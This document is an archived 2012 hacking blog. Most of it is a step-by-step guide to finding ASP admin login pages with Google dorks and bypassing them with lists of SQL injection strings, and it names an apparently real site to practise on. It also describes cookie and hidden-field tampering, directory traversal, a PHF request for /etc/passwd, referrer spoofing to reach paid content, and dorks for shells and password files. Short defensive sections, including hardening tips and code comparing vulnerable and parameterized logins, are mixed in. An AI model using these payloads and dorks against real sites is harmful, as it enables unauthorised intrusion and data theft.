Tuesday, May 29, 2012

Hack Website With "inurl adminlogin.asp" String

First of all, go to google.com, search for any one of the dorks below, and open one of the results:
inurl:adminlogin.asp

inurl:admin_login.asp

inurl:adminlogon.asp

inurl:admin_logon.asp

inurl:\\admin/admin_login.php

inurl:/admin.asp

inurl:/login.asp

inurl:/logon.asp

inurl:/adminlogin.asp

inurl:/adminlogon.asp

inurl:/admin_login.asp

inurl:/admin_logon.asp

inurl:/admin/admin.asp

inurl:/admin/login.asp

inurl:/admin/logon.asp

inurl:/admin/adminlogin.asp

inurl:/admin/adminlogon.asp

inurl:/admin/admin_login.asp

inurl:/admin/admin_logon.asp

inurl:/administrator/admin.asp

inurl:/administrator/login.asp

inurl:/administrator/logon.asp

inurl:root/login.asp

inurl:admin/index.asp


Click the Search button.

Then click on a website URL. When it opens, there will be fields for entering a

USER NAME

and a

PASSWORD

In the USERNAME box, type Admin,

and in the PASSWORD box, type any one of the strings below:

admin'--

1'or'1'='1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

1' OR '1'='1


then hit enter key . . .
now web has been hacked . . .

And Start Changing In ADMIN PANEL Ok'z.

Test ur experinse here
http://globaloiljobs.com/Admin​_Login.asp


its Admin Id (Username) Type 1' OR '1'='1

Or

Pasword 1' OR '1'='1

Sql Injection Manual Testing

Search for login or admin login pages.

Example: a Google dork. Go to the Google home page.

In the search bar, type "inurl:/admin/login.asp" or "inurl:/adminlogin.asp", or something like that.

Put the SQL magic quotes in the username and password fields. There are many SQL quotes, such as:
  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--
  • ='or''=

Protect Your Admin Panel

One of the main reasons why some government or private websites get hacked is the poor enforcement of security in their Admin Panel. After some nasty SQL Injection techniques, the next goal of the cracker is to find the admin page where he or she can put in the username and password he or she just got from the site. (I’m not really sure if there are ch1xorz who are into SQL Injection.lolz)

With common Google dorks like inurl:admin/admin.php or inurl:/admin/login.asp, a cracker could still find a lot of websites to try with easy-to-guess passwords (admin:admin) or the ' or '1'='1 SQL injection string (there are many more strings, but this is one of the common ones I know). Take note that there are many other ways of injecting a site, but so far SQL injection is one of the most common attacks.

With proper enforcement of security on the Admin Panel, you should be able to prevent some skiddie and easy attacks. So let's tackle 4 safety tips about some easy website configuration (the n00bz way) for the Admin Panel:

1. Enable HTTPS encryption or Use SSL Login Pages
This kind of encryption protects you from a script kiddie who does sniffing. Although HTTPS can be bypassed through SSL Strip, at least it gives us some protection from easy MITM attacks. HTTPS is inarguably important protection compared with unencrypted HTTP, which cripples your logins.

2. Edit The Name of Your Admin Panel
Don't give your Admin Panel a common file name like admin.php, login.php, admin/login.asp, cpanel.php, etc. Make sure your Admin Panel is not easy to find and cannot be scanned easily by common 'Admin Finders' on the net. If possible, try an Admin Finder to check your own website.

3. Enable or Create an .htaccess File
This kind of configuration allows website view restriction or site folder restriction, especially for sensitive files like backup files, scripts, and the Admin Panel. Adding server-side protection around the Admin Panel folder is like adding a second layer of protection to your website. I suggest you only allow your IP address to log in to your panel in order to stop people from trying to bypass your Admin Panel. If you have a fixed or static IP address, you might want to consider editing these lines:
allow from xxx.xxx.xxx.xxx
deny from xxx.xxx.xxx.xx
Under allow from, replace xxx.xxx.xxx.xxx with your fixed IP address so that only you can see a certain folder of the site, such as the Admin Panel. Then under deny from, replace xxx.xxx.xxx.xx with the IP address you want to block from the site, especially spammers and people who try to invade your website. Take note that you can add more values or IP addresses under the deny from and allow from lines. These are Apache 2.2 directives; Apache 2.4 expresses the same restriction with Require ip.

4. Update your site
Fix your code and update your version. This article should help you in avoiding SQL Injection.
Well, that's it for now! If you want to add some things about Web Admin Panel Security, feel free to comment below.
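To make tip 4 concrete, here is an added example (not code from the original post) showing why the ' or '1'='1 string mentioned above gets past a login query built by string concatenation, and why a parameterized query rejects it. The table layout, the account and the function names are assumptions made for the demo.

```python
import hashlib
import hmac
import os
import sqlite3

DEMO_PASSWORD = "constructed-demo-password"  # constructed sample credential


def kdf(password, salt):
    # Salted, slow hash so the hardened path never stores or compares plaintext
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db():
    """In-memory users table holding one constructed Admin account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT,"
               " pw_salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    # The plaintext column exists only so the vulnerable function can run
    db.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
               ("Admin", DEMO_PASSWORD, salt, kdf(DEMO_PASSWORD, salt)))
    return db


def login_concatenated(db, username, password):
    """Vulnerable: user input becomes part of the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # input that breaks the statement's syntax


def login_parameterized(db, username, password):
    """Hardened: input is bound as data and can never change the query."""
    row = db.execute("SELECT pw_salt, pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(stored, kdf(password, salt))


def compare(password):
    """Return (vulnerable result, hardened result) for the Admin account."""
    db = make_db()
    return (login_concatenated(db, "Admin", password),
            login_parameterized(db, "Admin", password))


if __name__ == "__main__":
    for pw in (DEMO_PASSWORD, "wrong-guess", "' or '1'='1"):
        print(repr(pw), compare(pw))
```

In the concatenated query the quote characters end the string literal early, so the trailing condition is evaluated as SQL; with placeholders the same characters are only ever compared as a password.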

Saturday, May 19, 2012

SQL INJECTION With "inurl:adminlogin.asp"

Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp sites.
First we need to find a site; start by opening Google.
Now we type our dork. Definition of dork: "a search entry for a certain type of site/exploit, etc."
There are a large number of Google dorks for basic SQL injection.
Here are the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'

Login Page is found in Google with the query "inurl:admin/login.asp"

How is it possible that my page /admin/login.asp is found in Google with the query "inurl:admin/login.asp" while it isn't with the "site:www.domain.xx" query?
I've this line of code in my robots.txt:
User-agent: *
Disallow: /admin/
And this in the HTML code of the page:
<meta name="robots" content="noindex, nofollow" />

You can check on Google Webmaster if the robots.txt is interpreted correctly by Google. You can also request the removal of a URL from the index there.

When you find the URL in the Google search result page (SERP), does it have the same title as found in your tag? And does it also have a description / snippet?
What I think is happening is that Google knows about the URL from a link on your site, so it'll attempt to crawl and index it. However, since it's blocked by robots.txt, it's not allowed to crawl the page, hence it can't see the noindex meta tag that's on your login page.
Since it doesn't know that it shouldn't index the page, Google will add the URL to its index. However, pages like this tend to only have a title and URL in the SERP, and they almost always don't have a description/snippet. Sometimes the title in the SERP looks like they've crawled the page, but what they're actually doing is trying to generate a title based on the anchor text of the links that are pointing at it.
The surefire way of having the page not show up in the SERP is to remove the Disallow: /admin/ command, and allow Googlebot to crawl the page and see the noindex,nofollow meta tag.
The noindex command will remove the page from the SERPs, and the nofollow will help inform Googlebot not to give priority to the links that it finds on your login page (this will help maintain your crawl efficiency, but does not guarantee Google won't crawl the links it finds on the page).
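The conflict described in this answer can be checked mechanically. The following is an added example, not part of the original thread: it uses the robots.txt rule, meta tag and URL from the question as constructed inputs, and the function and verdict names are assumptions.

```python
import urllib.robotparser
from html.parser import HTMLParser


class RobotsMeta(HTMLParser):
    """Collects the directives of every <meta name="robots"> tag."""

    def __init__(self):
        super().__init__()
        self.directives = set()

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "meta" and (attrs.get("name") or "").lower() == "robots":
            content = attrs.get("content") or ""
            self.directives.update(d.strip().lower() for d in content.split(","))


def audit(robots_txt, url, html, agent="Googlebot"):
    """Report whether a crawler is able to read the page's noindex directive."""
    rules = urllib.robotparser.RobotFileParser()
    rules.parse(robots_txt.splitlines())
    crawlable = rules.can_fetch(agent, url)

    meta = RobotsMeta()
    meta.feed(html)
    noindex = "noindex" in meta.directives

    if noindex and not crawlable:
        verdict = "conflict"      # noindex is never fetched; URL can still be listed
    elif noindex:
        verdict = "noindex-seen"  # crawler may fetch the page and read noindex
    elif not crawlable:
        verdict = "url-only"      # blocked from crawling, bare URL can be listed
    else:
        verdict = "indexable"
    return {"crawlable": crawlable, "noindex": noindex, "verdict": verdict}


# Constructed inputs taken from the question above
PAGE_URL = "http://www.domain.xx/admin/login.asp"
PAGE_HTML = ('<html><head><meta name="robots" content="noindex, nofollow" />'
             '</head></html>')
ROBOTS_AS_POSTED = "User-agent: *\nDisallow: /admin/\n"
ROBOTS_AS_ADVISED = "User-agent: *\nDisallow:\n"  # the /admin/ rule removed

if __name__ == "__main__":
    print(audit(ROBOTS_AS_POSTED, PAGE_URL, PAGE_HTML))
    print(audit(ROBOTS_AS_ADVISED, PAGE_URL, PAGE_HTML))
```

Neither robots.txt nor noindex is access control; they only affect what well-behaved crawlers fetch and list, so the login page still needs the server-side protections discussed earlier.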

How To Hack A Website With Google?

First step: View the Source

The first step is to view the source of the page, where you can find some useful things, which may or may not include hidden directories. Most lamers argue that there is nothing in the source, but you have to look in the comments of the page, where some webmasters keep their personal data (such as contacts, e-mails…). If you don't find any awesome information, just have a quick look through the source for additional clues.

Second step : Search for Hidden Tags and Edit Existing values

Find the <INPUT> tags in the source (the most abused tag) and make sure that all of them appear on the web page. If an extra tag appears in the source, it is a hidden tag. Hidden fields are fully under the client's control, so the server has to validate them like any other input. To view these hidden values, type javascript:<command> in the address bar instead of the regular http:// name:
javascript:alert("here you have view the HTTP FORM submission to GET or POST")
javascript:alert("hello")

You get a pop-up saying hello. To view or change the values, use the alert or void command respectively.
To view a value in the first form, type
javascript:alert(document.forms[0].varname.value)
Note: the first form is always index zero, not one.
To change a value in the form, use the void command
javascript:void(document.forms[0].varname.value="new value")


Third step:Common File & Directory Search
Check for common files and directories such as admin.php, passwd.php, login.cgi, index2.php, login.asp, login.php, /Admin, /cgi-bin/, /pub/, /images/, /scripts/. There are many common files and directories that you may hang around in for some hot stuff.
Let's take an example.
A site may have a link to http://www.testingha...cretfile345.txt
After you pay or access any sensitive data, it reports to this file on the web server. This technique is used by webmasters to view the user's IP or the location from which they are accessing the pages; these are helpful for tracing intruders.
(A script on the web server does this job for them.)
By looking at the URI in the location bar of the browser, you can access the (above) file or log on the web server.
Another example of bypassing authorization is the Cisco IOS HTTP authorization vulnerability.
The URL of the web-based administration interface contains only a two-digit number between 16 and 99.
http://www.testingha...NN/data/secret/.....

You just have to guess the value of NN (16-99) to access the device's administration interface at the highest privilege.


Fourth Step: Directory traversal
If you are familiar with basic DOS commands then you are aware of
cd..
cd…
cd\
In the same way, use web directory traversal as follows.
http://www.victim.co...e/dirs/sub/dir/
Above is a sample URL. To move up from the subdirectory, use directory traversal:
http://www.victim.com/some/dirs/sub/dir/../
http://www.victim.com/some/dirs/sub/dir/../../
If the web server is vulnerable then you may get access to the directories.
This exploit is almost always fixed; don't get disappointed, we will go through other techniques.

Fifth Step: cookie Manipulation

Check the cookies. If the site uses plain-text cookies then you may get something interesting.
To view cookie information type
javascript:alert(document.cookie)
To change the value of the cookie use this
javascript:void(document.cookie="desired_variable=some value")
If cookies are set on your computer then it will pop up with the values. A few people are afraid of cookies: they believe that cookies may steal valuable data on their systems, and these people don't allow sites to set cookies in their browser.
Cookies are small pieces of data which are used to identify the user (last visit, date, time). In short, you can say client-side validation. There are many articles on cookie stealing on hts.org and cs.net and videos on irongeek.com
PHP Injections
PHP is a server-side language
http://www.domain.com/index.php?page=main.php
http://www.domain.com/index.php?page=maliciouspage.php
http://www.domain.com/index.php?page=commonfile.php

does the above one need explanation

Sixth step : referrer spoofing

Referrer spoofing is another technique to override authentication.
Let's take an example:

I have designed a site which has the above vulnerability.
<%@ language=vbscript %>
<% option explicit %>
<html>
<head>
<title>welcome to the members</title>
</head>
<body bgcolor=pink>
<h1>welcome to members page</h1>
<%
' Deliberately weak check: HTTP_REFERER is a header sent by the client
dim strreferer, bolpermit
strreferer = request.servervariables("http_referer")
' Only the last 9 characters of the referring URL are compared
if right(strreferer, 9) = "login.asp" then
    bolpermit = true
    response.redirect "members.asp"
end if
if not bolpermit then
    response.redirect "login.asp"
end if
%>
</body>
</html>
This is poor coding from me because I was in a hurry to just finish the site. OK, let's come to the point.
Here you may observe the if condition: it checks that the rightmost 9 characters of the referring URL are login.asp (it checks the tail of the URL).

Let's see how this may be overridden:
http://localhost/login.asp
or
http://anysite.com./any/dir/login.asp

It works because we got the right file name as our referrer. It may be any URL, but the file name should be login.asp.
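As an added example (not code from the original post), the ASP page's Referer test is reproduced below in Python next to a server-side session check, to show what the members page should have depended on. The account, the cookie name and the class and function names are assumptions for the demo.

```python
import hmac
import secrets

# Constructed credential for the demo account
DEMO_USER, DEMO_PASSWORD = "member", "constructed-demo-password"


def permit_by_referer(headers):
    """Same logic as the ASP page: right(Referer, 9) = "login.asp"."""
    return headers.get("Referer", "")[-9:] == "login.asp"


class SessionStore:
    """Server-side record of who has actually authenticated."""

    def __init__(self):
        self._sessions = {}

    def login(self, username, password):
        ok = (hmac.compare_digest(username.encode(), DEMO_USER.encode()) and
              hmac.compare_digest(password.encode(), DEMO_PASSWORD.encode()))
        if not ok:
            return None
        token = secrets.token_urlsafe(32)  # unguessable, issued only after login
        self._sessions[token] = username
        return token

    def user_for(self, cookies):
        return self._sessions.get(cookies.get("session", ""))


def permit_by_session(store, cookies):
    """Hardened check: access depends on state the client cannot forge."""
    return store.user_for(cookies) is not None


def demo():
    store = SessionStore()
    # A request from a client that never logged in; the Referer value is the
    # one given in the text above
    forged = {"Referer": "http://anysite.com./any/dir/login.asp"}
    token = store.login(DEMO_USER, DEMO_PASSWORD)
    return {
        "referer_check_forged": permit_by_referer(forged),
        "session_check_no_cookie": permit_by_session(store, {}),
        "session_check_bad_token": permit_by_session(store, {"session": "guess"}),
        "session_check_logged_in": permit_by_session(store, {"session": token}),
        "failed_login_token": store.login(DEMO_USER, "wrong"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```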

what are you going to tell with that fuckin code??
May be the question arise. Let me explain if you are accessing porn sites they first check for authentication after that they set the values (variables) and they identify only with the referrers
http://members.somepornsite.com/
you got some stuff from the site which you want to access but it asks for credentials. To beat that do as follows
http://members.somepornsite.com/login.asp
just leave blank or use the SQL injections for three or more times until  you can get a warning page or invalid login page and note whether the site has set any cookie on your PC .read the variables carefully . if you toggle the values (variables ) or change the cookies you may access the members area
http://members.somepornsite.com/some/dir/images/gotit.jpg
or
http://members.somepornsite.com/some/dir/movies/huge.mpg
and they are many articles on referrer spoofing on cs.net check it out
:The classical PHF method
since some people are asking questions about the Phf method i will write how to use it here.
first in 95% of the time this method will not work since most people know about it and it has been fixed on most WebPages. all you have to do is to type in the address bar:
http://www.victim.com/cgi-bin/phf?Qalias=x%Oal/bin/cat%20/etc/passwd

Seventh step: Generate Errors

Generate an error on the page, excluding the 404 error. If you get any error except 404 or page not displayed, such as 403, 500 or 501, then it is vulnerable.
Note: every vulnerability may or may not be exploitable.

Eighth step: Googling

On these particular forums you might hear the term "Google it".
Before asking questions (basic or advanced), use Google. I will show you how to use Google from a hacker's point of view.
inurl:adminlogin.asp = searches for admin logins

inurl:backup filetype:mdb = looks for old databases with logins 

"index of cgi-bin" = the directory of cgi-bin;)
 intitle:"PHP Shell *" "Enable stderr" filetype:php = a remote php shell
intitle:"network administration" inurl:"nic" = A funny thing to take over networked printers
"-dir/pws"
"dir:cgi"
"dir:sql"
"dir:php"
"dir:!bin"
"filetype:*.*"
filetype:pwd pwd inurl:"pwd" intitle:":"  
inurl:".com/accounts/NewAccount " intitle:"google" intext:"password"
intitle:"Powered by Invision" intext:"invision" inurl:"invision"
intitle:”Admin” intext:”password”
for unix type of machines
"http://www.domain.com/index.php?page=/etc/shadow" or '?page=/etc/passwd'
using google to scan a website
site:www.victim.com
the above one scans the entire site
looking in the cached (the big buckets of google) pages of configurations or Administrators page
cache:www.victim.com intext:500
cache:www.victim.com intext:”Administrator”
cache:www.victim.com inurl:login | inurl:config
Google itself warns that it is not responsible …… some stuff to view the links of website
link:www.victim.com
to search a topic in abysmal manner
Google keyword filetype:pdf
Advance hacking filetype:ppt
Spoofing filetype:doc

Ninth step: Tools
Intellitamper : to scan the web
Nmap: port scanner
Stealth HTTP Scanner
WebSleuth : input validation attack
Black Widow : mirroring tool
WebCracker 5.0
Brutus AET2
CookieSpy
Paros
Due to the Post length the below topics are truncated Google it for more information

Topics Skipped:
SQL Injections,
XSS
Unpatched security flaws
Denial of Service
Improper Error Handling
Insertion of Malicious Commands or Command Modifiers,
Buffer Overflows
Active Session Hijacking
Client Side Caching
Forced Browsing

FAQ on the Step By Step Guide

Can I hack using this Guide?
It depends on how you exploit the vulnerabilities. The above guide is just the basics of hacks.
First check the version of the browsers, web server, SMTP, OS.
Go to www.insecure.org where you can find the latest vulnerabilities and exploits.
Search for exploits for that version ...
www.webattack.com

I need more explanation ?

Use google for the below keywords
• Input validation Attacks
• Directory Transversals (Path Truncation )
• Server side Executions
• Cross-site Scripting
• Cookie stealing
• Hidden Web Paths
• Escape Encoding
• NULL Byte
• Register_globals
• Attacking Web services and Data stores
• Common File Checks
• SQL Injection
• Man-in-the-middle Attacks
• Cookie Hijacking
• URL Obfuscation Attacks
• Session Hijacking
• Observing Customer Data
• Link Traversal
• Java Applet reverse engineering
• Parameter Passing
• Client-side Vulnerability Exploitation
• Friendly login URL’s
• Third-party shortened URL’s
• Host name obfuscation
• URL obfuscation
• IDN obfuscation methods

Wednesday, May 2, 2012

inurl:admin.asp

Besides "inurl:login/admin.asp" and "inurl:administrator/login.asp", I want to tell you the last and also the most powerful keyword, which is "inurl:admin.asp". Use it and you can get almost all the results you want. Following are the results I found with it.


I only list some of the search results; you can get more with the keyword "inurl:admin.asp".

inurl:adminhome.asp

In the last post, I introduced the keyword "inurl:admin/login.asp"; now we try another keyword, "inurl:adminhome.asp". Following are the search results with it.


inurl:admin/login.asp

Hi friends, in the last post I introduced the keyword "inurl:administrator_login.asp"; now we can try a more interesting search. For example, "inurl:admin/login.asp" and "inurl:adminlogin.asp". Following are the search results with these keywords.

Is it cool? Don't hesitate, just try it.

inurl:administrator_login.asp

In the last post, we learned how to search for the administrator login page with the "inurl:administratorlogin.asp" keyword; now we can try "inurl:administrator_login.asp" for more results.


You can try more, for example "inurl:login/administrator.asp".

inurl:administratorlogin.asp

I have introduced a way to search the administrator login page by "inurl:login/admin.asp", and another way is to search "inurl:administratorlogin.asp" in google.


Following are the search results with "inurl:administratorlogin.asp" keywords.


You could also search by "inurl:administrator/login.asp" or "inurl:administrator login.asp" to get the results.

Tuesday, May 1, 2012

inurl:login/admin.asp

Do you know how to hack a web system? You could search for the following keywords in Google to find the entrance to the admin login page, and hack the password to enter the system.

The keywords are:
For example, you can search for "inurl:login/admin.asp" in Google, and you get the following results:

Click any URL above and you can log in from the admin page; you can use hacking software to hack the passwords. In most cases, the default login username and password are "admin".